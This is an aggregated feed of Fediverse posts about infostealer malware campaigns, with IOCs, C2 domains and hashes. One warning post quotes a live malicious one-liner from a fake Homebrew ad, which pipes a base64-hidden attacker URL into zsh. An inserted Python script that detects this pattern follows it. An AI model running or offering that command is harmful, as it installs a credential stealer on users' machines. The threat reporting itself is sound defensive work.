#stealer — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #stealer, aggregated by home.social.
-
🔥 TRENDING
📢 Gremlin Stealer Evolves into Modular Threat with Advanced Evasion Capabilities
🔗 https://www.infosecurity-magazine.com/news/gremlin-stealer-evolves-into/
#Gremlin #Stealer #Evolves #Modular #GlobalFeed #News #EN
Automatically posted by Global Feed Bot
-
ISC Diary: Malicious ad for Homebrew leads to #MacSync #Stealer https://isc.sans.edu/diary/32942
-
New wave of attacks on Windows users. NWHStealer distributed via fake installers (e.g. ProtonVPN) and hosting platforms
Analysts at Malwarebytes warn of new campaigns that share a common denominator: an infostealer the researchers have dubbed NWHStealer. The malware is delivered to users in many different ways, from modified installers of ProtonVPN, OhmGraphite, Pachtop and HardwareVisualizer to game mods (Xeno). As you can see, cybercriminals prey on users' trust in popular products, by...
#Aktualności #Malware #Nwhstealer #Phishing #Protonvpn #Stealer
-
They got hacked because an employee of a SaaS they used downloaded game cheats. Or why you have to watch out for OAuth!
What a beautiful disaster! This story has everything: the infection of not one but two not-very-prudent employees of different "technical" companies. A hop from one infected infrastructure to the next, because neither company used the principle of least privilege, and one gets the impression they used no security mechanisms at all. And finally an attacker group that steals the identity of another group, plus venom-spitting online opponents of vibecoding who went after the company with pitchforks, because everyone knows that "every AI programmer is an idiot". And it turned out that AI had nothing to do with this attack.
How did it start?
On 19 April a post appeared on a well-known hacking forum saying that Vercel, a platform popular among vibecoders, had been hacked. Attackers signing as ShinyHunters put the company's keys and database access up for sale. Things heated up in the community, because Vercel is also behind the v0 tool and the popular Next.js library, which immediately brought to mind the recent high-profile supply chain attacks. At first, of course, there was speculation that the breach was the result of careless vibecoding being used to build and configure Vercel's security mechanisms, because the company is associated with vibecoding. But the truth turned out to be even more painful. The source of the attack was a chain of two employees.
The first was an employee of an external company, Contex.ai, who downloaded... cheats for the game Roblox infected with the Lumma infostealer. Thanks to that, the attackers had access to Contex.ai's infrastructure and its customers' data. Two months [...]
#AI #EskalacjaPrzywilejów #GoogleWorkspace #Infostealer #Malware #SaaS #Stealer #Vercel
-
https://www.europesays.com/at/83004/ SparkCat and Venom Stealer: New malware wave threatens crypto wallets #AT #Austria #KryptoWallets #Kryptowährungen #MalwareWelle #Österreich #Schadsoftware #Science #Science&Technology #Sicherheitsexperten #Smartphones #SparkCat #Stealer #Technik #Technology #venom #Welle #Wissenschaft #Wissenschaft&Technik
-
A more sane and parseable list of indicators:
Landing page
httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7
Loaders
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
httpX://datasphere.us[.]com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197
Mocked User Agent for curls
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
APIs
httpX://datasphere.us[.]com/api/debug/event # initial info gathering
httpX://datasphere.us[.]com/gate # stealer upload location
httpX://datasphere.us[.]com/gate/chunk # large file uploads
httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat API
api key
61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f
-
Absolute state of google, (and frankly the expectations of developers for installing things).
Setting up an older Mac to use as a new work machine, search google for "brew Mac" looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.
First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *
echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh
Aww man that base64 makes me feel good and trusting, wonder what's inside
echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/
Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1
This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74
Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed
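The trick in the post above is worth catching mechanically: the one-liner echoes a legitimate-looking Apple URL while the URL it actually fetches is hidden in a base64 literal that is decoded at run time and piped straight into zsh. The following Python triage helper is an added example (my code, not the poster's and not from the page) that pulls inline base64 literals out of a shell command, decodes them, reports any URL that is not visibly shown in the command, and flags the pipe into a shell interpreter. The sample command is the one quoted in the post; the regexes are heuristics of my own, and the defanging format (hxxp scheme, [.] in the host) is my choice.

```python
import base64
import re
from urllib.parse import urlsplit

# Constructed sample input: the install one-liner quoted in the post above,
# which prints a legitimate-looking Apple URL while fetching a different,
# base64-hidden URL and piping the response straight into zsh.
SAMPLE_ONE_LINER = (
    'echo "Downloading Update: https://support.apple.com/downloads/'
    'xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJl'
    'LnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRm'
    'YTA3N2UxOTc=" | base64 -d) | zsh'
)

# A quoted base64 literal immediately piped into `base64 -d`
# (`-D` on macOS, `--decode` on GNU coreutils). Heuristic, not a shell parser.
B64_DECODE = re.compile(
    r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']\s*\|\s*base64\s+(?:-d|-D|--decode)\b'
)
# Anything visibly shown as a URL in the command text (the decoy, typically).
VISIBLE_URL = re.compile(r'https?://[^\s"\'<>)]+')
# A pipe whose consumer is a shell interpreter.
PIPE_TO_SHELL = re.compile(r'\|\s*(?:ba|z|k)?sh\b')


def defang(url: str) -> str:
    """Render a URL non-clickable: hxxp scheme and [.] in the host only."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp", 1)
    host = parts.netloc.replace(".", "[.]")
    query = f"?{parts.query}" if parts.query else ""
    return f"{scheme}://{host}{parts.path}{query}"


def hidden_urls(command: str) -> list[str]:
    """Decode every inline base64 literal and return the URLs found, defanged."""
    found = []
    for match in B64_DECODE.finditer(command):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: nothing to report
        if decoded.startswith(("http://", "https://")):
            found.append(defang(decoded))
    return found


def triage(command: str) -> dict:
    """Score a one-liner for the decoy-URL / hidden-fetch / pipe-to-shell pattern."""
    hidden = hidden_urls(command)
    visible = VISIBLE_URL.findall(command)
    to_shell = PIPE_TO_SHELL.search(command) is not None
    if hidden and to_shell:
        verdict = "high"      # fetches an obfuscated URL and executes the response
    elif to_shell and ("curl" in command or "wget" in command):
        verdict = "medium"    # plain remote-script execution, still worth a look
    else:
        verdict = "low"
    return {
        "visible_urls": visible,
        "hidden_urls": hidden,
        "pipes_to_shell": to_shell,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ONE_LINER).items():
        print(f"{key}: {value}")
```

Run against the sample, `hidden_urls` contains only the datasphere loader URL while `visible_urls` contains only the Apple decoy, which is exactly the mismatch a reviewer of copy-paste install instructions wants surfaced. The same function can be pointed at shell history or EDR process command lines; treat the regexes as a first filter rather than a parser, since quoting and variable expansion can hide the literal in ways this does not follow.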
-
Mamont malware attacks Russia again
The Mamont trojan continues its malicious activity aimed at Android smartphone users. While tracking the activity of malware families for Android operating systems, experts from the cyber threat research department of "Перспективный мониторинг" (Perspective Monitoring) discovered a variant of the Mamont malware named Фото(92).apk, dated 2026. A thorough analysis of this sample revealed a new C&C control panel: fensteadom[.]com.
https://habr.com/ru/companies/pm/articles/993182/
#вредоносное_по #android #stealer #mamont #мошенники_в_интернете #telegram
-
When you finally reverse the loader for that malware sample #VirusTotal flagged as "APT XYZ", and it turns out to be just a #Vidar #Stealer dropper.
4 stages including steganography for nothing 😕
-
Malware attacking Discord and popular web browsers: a detailed analysis of VVS Stealer
Researchers at Unit42 (Palo Alto Networks) have published a detailed analysis of a new threat, VVS Stealer (also known as VVS $tealer). This time the attackers targeted users of the Discord platform. The malware, written in Python and obfuscated with the commercial Pyarmor tool, is distributed through that same platform and sold for...
-
2026-01-01 (Thursday): #LummaStealer infection with follow-up malware.
A #pcap of the infection traffic, the #Lumma #Stealer files, and a list of IOCs are available at https://www.malware-traffic-analysis.net/2026/01/01/index.html
Lumma Stealer C2 domain: offenms[.]cyou
The follow-up malware is using memory-scanner[.]cc for its C2 traffic, just like I saw on 2025-12-30. But this follow-up malware also used another C2 domain: communicationfirewall-security[.]cc
-
@jack_daniel this isn't new, what is new is we think it is other people's problem when the insatiable demand continues and won't be solved or mitigated. the drug war is just to keep the local gun club running and 'in control'. woke lib people think legalization and rehab plus education could be the only way out - they actually could be right, instead we will keep doing things the old way and failing, this is not a bug it is a feature of the entire power structure, politically and socioeconomically. legalization sounds bad but at least you keep the money here and not funneling billions through a sewer in juarez, something to think about, that is a hell of a lot of taxes #change my mind #george willpower #stealer's wheel #meth tariff
-
Fake Doom WADs that are actually malware hosted on SourceForge almost got my friend.
Please be careful downloading mods as a streamer!
#Doom #WAD #SourceForge #Malware #VTuber #ReverseEngineering #Stealer
https://urlscan.io/result/019b5efd-425a-721d-8907-127af9a23a56/
https://app.any.run/tasks/200a705f-e106-46d7-9773-607899046b3d
Command and control:
https://www.virustotal.com/gui/url/db81a7895c26016a19106ca3442417e18823eb7892464a1c6735eda33df88a6a
https://urlscan.io/result/019b6790-5571-71a5-a4f8-607eef7bae0f/
-
Analyzing malware using a sample from the BO Team group: a detailed manual for beginners
Hi, Habr! This is Nikita Polosukhin, lead analyst at the RED Security SOC cyberattack monitoring and response center. Today we take apart a loader from the BO Team group. The material is intended for beginner security specialists and is a short manual explaining how to quickly determine a piece of malware's functionality, extract indicators from a sample, and which tools can be used for the analysis.
https://habr.com/ru/companies/ru_mts/articles/980374/
#BO_Team #RED_Security #анализ_вредоносного_ПО #реверсинжиниринг #Кибербезопасность #Loader #Stealer #анализ_памяти #статический_анализ #динамический_анализ
-
2025-12-23 (Tuesday): Based on yesterday's Jamf article, I downloaded the fake installer for #MacSyncStealer from zkcall[.]net and ran it on a macOS host in my lab.
A #pcap of the #MacSync #Stealer traffic, the associated IOCs, the #malware sample, and a link to the Jamf article are at www.malware-traffic-analysis.net/2025/12/23/index.html
Of note, the zkcall[.]net download page also has a link for a Windows download. The downloaded EXE file appears to be #DonutLoader, based on one of the follow-up EXE files it retrieved and ran: https://app.any.run/tasks/afd3ae74-2976-492b-a3c0-6e19e9127f68
-
[UPDATE] His account was taken over, but Google technical support won't help him
What can happen when someone takes over your Google account? Lots. Of terrible. Things. Can such an account be recovered? Supposedly yes, but Mateusz's case shows that... it can't. And that is despite contacting Google technical support and despite having plenty of evidence that the hijacked account belongs to Mateusz.
Here is one of the most absurd stories we have seen recently. A true digital catch-22. See how Mateusz fell into a black hole, and realize how little you mean to companies like Google even though you have been paying them for various services for years. Read the article to the end, where we explain what is worth doing to avoid losses like those Mateusz suffered as a result of a certain gap in Google's processes.
A friend sent me a link, which I clicked...
Mateusz's story begins on 25 September, when a friend contacts him on Discord. The friend sends him a link to the site https://vampirk-beta.netlify[.]app and Mateusz downloads an .exe file from it (MD5: 1E7997DFEF983BE219D95A1842FEE298), thinking it is the game they are talking about. And he runs this "game". He does so because he works in the video game industry, and such requests from friends were nothing unusual for him. The problem is that the account of the friend who wrote to Mateusz had earlier been taken over by the attacker, and the downloaded game turned out to be a trojan...
The result? The attacker takes over Mateusz's accounts, the one on Discord as well as others, including, unfortunately, his Google account. But apparently he steals only cookies, and merely "entering Mateusz's session" does not let him take full control of the account, presumably for lack of the password, so he does something very clever:
The intruder asks me [...]
#Ataki #Discord #GMail #Google #Malware #PomocTechniczna #Stealer #Support
https://niebezpiecznik.pl/post/przejete-konto-google-gmail-jak-odzyskac-pomoc-suport-kontakt/
-
A game on Steam robbed a streamer with cancer
BlockBlasters is a retro-styled 2D platformer promising dynamic action and responsive controls. It was verified and available for free on Steam for almost two months, from 30 July to 21 September this year, and in that time managed to collect several hundred positive ratings from the community. According to researchers, the game stopped being safe on 30 August,...
#WBiegu #Blockblasters #Crypto #Stealer #Steam
https://sekurak.pl/gra-na-steamie-okradla-streamera-chorego-na-raka/
-
Coyote Banking Trojan First to Abuse Microsoft UIA https://www.securityweek.com/coyote-banking-trojan-first-to-abuse-microsoft-uia/ #Malware&Threats #bankingtrojan #MicrosoftUIA #malware #stealer #Coyote
-
The website of the "Deutsche Vereinigung für internationales Recht" (dvir[.]de) is currently compromised and spreading #Lumma #Stealer via #FakeCaptcha attack.
Compromised webfile is:
hxxp[://]www[.]dvir[.]de/wp-content/themes/Dummy/assets/js/main[.]min[.]js?ver=1[.]0
-
🚨 Valve’s Steam game platform was exploited to push malware—twice in 2 months. 👀
Valve has removed “Sniper: Phantom’s Resolution” from Steam. Last month it banned “PirateFi”—both reportedly contained infostealer malware.
Read @theJoshMeister’s report: https://www.intego.com/mac-security-blog/steam-game-store-exploited-to-push-malware-twice-in-2-months/
#malware #steamgame #steamstorepage #infostealer #stealer #gaming #gamingnews #malwareprotection #antivirus #videogamenews #gamenews #steam #cybersecurity #cybersecuritynews #infosec #securitynews #informationsecurity #malwarealert
-
Threat Actor Claims to Possess 10GB of Stolen Login Credentials https://dailydarkweb.net/threat-actor-claims-to-possess-10gb-of-stolen-login-credentials/ #DataBreaches #StealerLogs #credential #government #stealerlog #defense #stealer
-
Mastodon communities, be vigilant! Bad actors are creating accounts within the Fediverse and then using them to distribute malware. We identified one such case in which the threat actor had gone undetected since 2022. That Mastodon instance was one with a climate change focus. The threat actor was distributing an information stealer through their account.
We are happy to have helped the instance owner figure out why they have been on blocklists intermittently for the last few years, but also get that particular threat out of their Mastodon instance and safe for users.
There are undoubtedly many more of these across the Fediverse. Hopefully more awareness can get them detected and shut down faster.
For our fellow security nerds... this was #vidar malware with sha256 975932eeda7cc3feea07bc1f8576e1e73e4e001c6fe477c8df7272ee2e0ba20d
and a c2 IP 78[.]47[.]227[.]68 from the instance.
there is still at least one more Mastodon instance impacted that we are trying to reach.
#malware #stealer #mastodon #threatintel #cybercrime #threatintelligence #cybersecurity #infosec #infoblox #infobloxthreatintel #fakeaccounts #c2
-
Game Over: Dissecting a stealer that targets gamers
Getting friends together in Discord* after work and playing a couple of matches of Dota2 or CS2 is ideal. If you are the lucky owner of an AK-47 "Case Hardened" skin with pattern 661 (worth upwards of $1 million), a Doppler Ruby karambit (worth upwards of $8 thousand) or another cool digital asset, you most likely don't want them stolen. Skin theft in CS is of course a very rare case, but what if someone gets access to your Discord*, Telegram or all the passwords in your browser? Of course nobody wants to add their data to the already massive leak lists, but what do online games have to do with it? The point is that there is malware aimed specifically at the gaming community. The malware spreads via Discord*, fake Steam updates or fake sites offering early access to popular games. Below the cut we dissect Epsilon Stealer: how it works, how it spreads, why it is dangerous and, most importantly, how to find and detect its activity.
https://habr.com/ru/companies/jetinfosystems/articles/874224/
#epsilon #stealer #вредоносное_по #cybersecurity #кража_данных #фишинг #гейминг #cyberattack
-
A new way of stealing data from Windows systems: malware via RDP, a campaign by the Russian APT29 group
The Russian APT group "Midnight Blizzard" is using .rdp files in a malware campaign that enables the theft of data from users' drives and the distribution of malicious software in the victim's network. The attack relies on tricking the user into opening a crafted .rdp file, which results in data theft and potential infection of other devices. Our pentesters came across traces of this...
-
Law Enforcement Puts a Damning Dent in RedLine and Meta Infostealer Operations https://thecyberexpress.com/operation-magnus-redline-and-meta-infostealer/ #RedlineandMetaInfostealer #TheCyberExpressNews #RedlineInfostealer #CyberEssentials #MetaInfostealer #OperationMagnus #TheCyberExpress #RedLineStealer #FirewallDaily #ThreatActors #MalwareNews #DutchPolice #infostealer #METAstealer #CyberNews #Europol #Stealer #AFP #FBI
-
Hey there! I stumbled upon a fresh sample of Formbook info-stealer malware. During analysis I found this malware hides its payload into a vulnerable WordPress website.
Read the article to know more.
#FormBook #Stealer #MalwareAnalysis #MalwareResearch #CTI #ThreatIntel #InfoSec https://ashishranax.github.io/posts/FormBook-Malware-The-Uninvited-Guest-of-WordPress/
-
⚠️ Rutger Stealer ⚠️
Threat actor, sup3rm5n, is allegedly selling Rutger Stealer. It steals various types of data such as credit card info, Chromium cookies, Discord, Telegram, cold wallets, logins and passwords.
#CTI #DarkWeb #DarkWebInformer #Cybercrime #Cybersecurity #Rutger #Stealer
X Link: https://twitter.com/DarkWebInformer/status/1786821306047926753
-
A Full Analysis of the Pure #malware_removal Family: Unique and Growing Threat
The folks at ANY.RUN have posted an analysis of PURE, the #crypter and multifunctional #stealer malware. While advertised as educational software, Malware Bazaar's database has too many listings to support this claim. Check out https://bazaar.abuse.ch/browse.php?search=tag%3ApureCrypter
PURE is purchased via a website and telegram bots often involving Bitcoin. PureCrypter's behavior flow is typical of loader or staged loader malware. They also examine PureLogs and PureMiner. All family members exhibit malicious code behaviors.
Kudos to the ANY.RUN folks for presenting a deeply technical analysis in an excellent narrative.
-
One clever tactic used by the attackers involves deleting the stolen cookies after extracting them. This effectively logs the victims out of their own accounts.
-
Rhadamanthys Stealer has its own web, I had missed that completely.
Yet another sign that the Stealer market is growing, maturing and getting increasingly professional and an important part of the ecosystem.
-
#Rhadamanthys #stealer seems to be having a moment right now. Quick rundown on what we know about infection trends & its post-exploit TTPs
Discovered last summer, it's one of several popular & emerging #infostealer #malware with new/improved evasion and/or theft capabilities observed in recent months. Like many popular families, Rhadamanthys initial infections occur via multiple vectors, including #phishing & #spam email attachments and - increasingly - legitimate web search ads: https://www.malware-traffic-analysis.net/2023/01/03/index.html, https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
In our broad analysis of the infostealer threat landscape, we identified #mitreattack TTPs associated with 16 families across dozens of public reports. We've already added more reported techniques to Rhadamanthys' set since the report dropped this week https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w
Still somewhat limited public reporting on this threat to date, although we've identified 22 (sub-)techniques associated with Rhadamanthys so far. Visualize them and pivot to associated defensive & offensive testing capabilities here: https://app.tidalcyber.com/share/techniqueset/48405ee2-b243-4bda-a6c2-75eb80869056
In addition to the reports above, two other resources here: https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web, https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/. Thanks to the teams that published great reporting & analysis around Rhadamanthys so far, including ThreatMon Accenture @malware_traffic & Cyble
-
Over 6,000 login credentials, stolen using #Stealer malware and relating to accounts linked to 41 Italian institutional portals, have been collected from the Dark Web. Possible compromise of the passwords of both ordinary citizens and public employees. Here is our analysis of what happened
By Dario #Fadda on #Cybersecurity360
https://www.cybersecurity360.it/nuove-minacce/data-leak-di-credenziali-della-pa-italiana-seimila-password-violate-il-rischio-e-elevato/